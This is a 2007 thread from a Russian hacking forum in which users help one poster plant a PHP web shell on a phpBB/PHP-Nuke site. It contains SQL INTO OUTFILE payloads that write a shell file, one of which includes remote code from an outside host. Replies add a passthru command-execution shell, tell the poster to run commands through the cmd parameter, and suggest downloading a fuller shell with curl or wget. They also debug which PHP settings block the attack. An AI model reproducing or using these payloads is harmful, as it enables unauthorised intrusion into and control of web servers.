Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Проблемы при заливке шелла |
04.07.2007, 20:54
|
|
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102
Репутация:
5
|
|
Проблемы при заливке шелла
Заливаю шелл через востановление базы в phpbb
Код:
SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
Код исполняется это факт, но когда захожу на
http://host/Forums/images/avatars/shell.php - выбрасывает пустую страницу =( "?" - в конце не помогает.
Из-за чего такое может быть? |
|
|
04.07.2007, 20:56
|
|
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441
Репутация:
161
|
|
в папке куда ты залил шел находится конфигурационный файл Апача...
с параметрами: "первый нах"(шутка, но только про имя параметра...)
|
|
|
|
04.07.2007, 21:03
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
прав не хватает, что бы через бд файл заливать
|
|
|
|
04.07.2007, 21:23
|
|
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102
Репутация:
5
|
|
Сообщение от maxster
прав не хватает, что бы через бд файл заливать
не факт, обычно если не хватает прав, то вобще ничего не создается, и выбрасывает уведомления, а тут с этим все в порядке.
|
|
|
|
04.07.2007, 21:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
если открывается пшп файл, то это уже есть гуд. скорей всего инклуд извне запрещен, так что пробни вначале
Код:
SELECT '<? phpinfo() ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
если при заходе на сцылко shell.php покажет те пшпинфо, то можешь заливать такой код
Код:
<? passthru($_GET[cmd]); ?>
потом юзай shell.php?cmd=ls
зы. а далее ищи качалки и заливай норм шелл (which curl;which wget;which fetch;which lynx etc )
__________________
ПИУ-ПИУ...
|
|
|
|
04.07.2007, 21:32
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Возможно просто отключена возможность подключения удаленных файлов через include().
Создай файл с кодом
и посмотри на директуву allow_url_fopen, если она off, тогда через include() ничего не вийдет. |
|
|
|
04.07.2007, 21:38
|
|
Новичок
Регистрация: 28.10.2006
Сообщений: 23
Провел на форуме:
125281
Репутация:
1
|
|
попробуй
Код:
SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE '/bla/bla-bla/Forums/images/avatars/shell.php';
|
|
|
|
04.07.2007, 21:57
|
|
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102
Репутация:
5
|
|
Такс phpinfo - катит
allow_url_fopen - on.
Все, теперь просто cmd - сделаю, но интересно почему - инклуд шелла не прокатил =(
Хотя все ясно
allow_url_include - Off
Чем можно заменить include? кажется можно curl, но как?
Последний раз редактировалось Azter; 04.07.2007 в 22:00..
|
|
|
|
04.07.2007, 22:07
|
|
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102
Репутация:
5
|
|
Кстати
Код:
<? passthru($_GET[cmd]); ?>
не катит, при запросе любой команды тоже белая страница когда просто запустил shell.php то квакнуло Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\путь_к_шелу |
|
|
|
04.07.2007, 22:44
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Может быть safe_mode = on, тогда не команды не выполняются.
Последний раз редактировалось The_HuliGun; 04.07.2007 в 22:53..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
